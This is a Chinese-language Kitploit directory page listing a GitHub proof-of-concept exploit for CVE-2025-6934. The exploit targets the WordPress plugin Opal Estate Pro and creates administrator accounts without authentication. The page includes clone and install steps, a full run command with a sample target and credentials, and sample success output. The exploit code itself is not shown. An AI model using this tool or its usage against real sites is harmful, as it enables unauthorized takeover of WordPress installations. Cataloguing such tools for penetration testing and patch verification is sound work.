Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-6934 — 用于 WordPress Opal Estate Pro 的自动化 PoC 漏洞利用,可检测存在漏洞的版本、获取 nonce,并创建未经授权的管理员账户。 | Kitploit
工具/GitHubGitHub/rosemary1337/cve-2025-6934
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试红队Archived
GitHubrosemary1337/cve-2025-6934

CVE-2025-6934

用于 WordPress Opal Estate Pro 的自动化 PoC 漏洞利用,可检测存在漏洞的版本、获取 nonce,并创建未经授权的管理员账户。

查看仓库
51年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-6934 自动利用工具

Python Status Author


⚡ 概述

CVE-2025-6934 是一个概念验证(PoC)漏洞利用程序,针对 WordPress 插件:Opal Estate Pro ≤ 1.7.5。
该利用程序演示了无需身份验证即可创建管理员账户。

免责声明: 此 PoC 仅供教育目的使用。未经许可,请勿在系统上使用。


🛠 功能特性

  • 自动检测插件版本。
  • 获取注册所需的 nonce。
  • 无需身份验证即可创建新的管理员账户。
  • 带有状态、成功、失败和信息消息的彩色控制台输出。
  • 适用于 Python 3.x,且依赖极少。

⚙️ 安装

  1. 克隆仓库:
git clone https://github.com/Rosemary1337/CVE-2025-6934.git
cd CVE-2025-6934
  1. 安装依赖:
pip install -r requirements.txt

依赖项:requests、beautifulsoup4、colorama


🚀 使用方法

python3 main.py -u <TARGET_URL> -mail <EMAIL> -password <PASSWORD> -user <USERNAME>

示例:

python3 main.py -u http://site.com/ -mail [email protected] -password 3xplo1tI5Fun -user r1337

参数

Flag描述必填默认值
-u, --url目标站点 URL是-
-mail, --newmail新管理员邮箱是-
-password, --newpassword新管理员密码是-
-user, --username新管理员用户名否administrator

🎨 输出

控制台显示:

  • 状态消息 [•]
  • 成功 [✔]
  • 失败 [✖]
  • 信息 [i]

示例:

[•] Starting Exploit...
[✔] Nonce Found: xyz123
[✔] Exploit Successful!
    Username : r1337
    Email    : [email protected]
    Password : 3xplo1tI5Fun
    Role     : administrator

🔐 安全与免责声明

  • 仅用于教育与测试目的。
  • 未经明确许可,请勿攻击网站。
  • 仅在受控实验室或经授权的渗透测试中使用

🔗 与我联系

我是一名活跃的开发者,喜欢构建工具并分享知识。你可以通过以下方式联系我:

下载工具